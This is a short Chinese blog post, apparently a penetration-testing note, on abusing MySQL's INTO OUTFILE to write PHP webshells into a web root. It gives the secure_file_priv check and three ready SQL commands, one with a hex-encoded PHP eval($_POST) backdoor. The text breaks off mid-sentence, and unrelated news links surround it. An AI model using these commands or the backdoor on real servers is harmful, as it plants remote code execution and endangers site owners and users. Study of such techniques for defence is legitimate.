mysql利用
创始人
2024-06-02 21:48:15
写webshell
以mysql数据库为例
outfile
写shell需要判断当前有没有设置secure_file_priv,只有当secure_file_priv为空才有权限写文件,这个配置由my.ini定义,无法在执行sql的情景更改配置。
show global variables like '%secure%';
写入webshell
#写入常规一句话
select '' into outfile 'C:\\phpstudy_pro\\WWW\\loga.php';
#存到数据库表中再写入
Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES('');Select cmd from temp into outfile 'C:\\phpstudy_pro\\WWW\\loga.php';Drop TABLE IF EXISTS temp;
#使用hex编码写入
select 0x3c3f706870206576616c28245f504f53545b2278225d29203f3e into outfile 'C:\\phpstudy_pro\\WWW\\x.php'
outfile可以导出多行数据,但是在将数据写到文件时mysql会对换行符(0a),制表符(09)等特殊字符做处理。使用有换行符的webshell时,很多hex编码后换行符使用的是0a(即\n),而0a会被outfile做特殊处理,除了换行
上一篇:Go爬虫学习笔记(三)
下一篇:关于对象与属性
相关内容
热门资讯
原创 恋...
2026年刚刚开始,娱乐圈的吃瓜新闻便接连不断。先是司晓迪爆料某男明星的私事,紧接着是刘一诺与檀健次...
为何近期污染范围较大?成都市生...
1月12日,红星新闻记者了解到,根据省级生态环境和气象部门空气质量前期联合会商结果,1月8日起,四川...
最新或2023(历届)四川美术...
最新或2023(历届)四川美术联考/统考色彩考试题目 考题:食堂今日菜品 一、必备内容: 以食...
最新或2023(历届)四川美术...
明日素描、速写考试 素描 最新或2023(历届)12月6日上午09:00-12:00(满分100分...
最新或2023(历届)福建高考...
福建最新或2023(历届)高考招生艺体类统考12月中旬开考 福建省最新或2023(历届)高招艺术类、...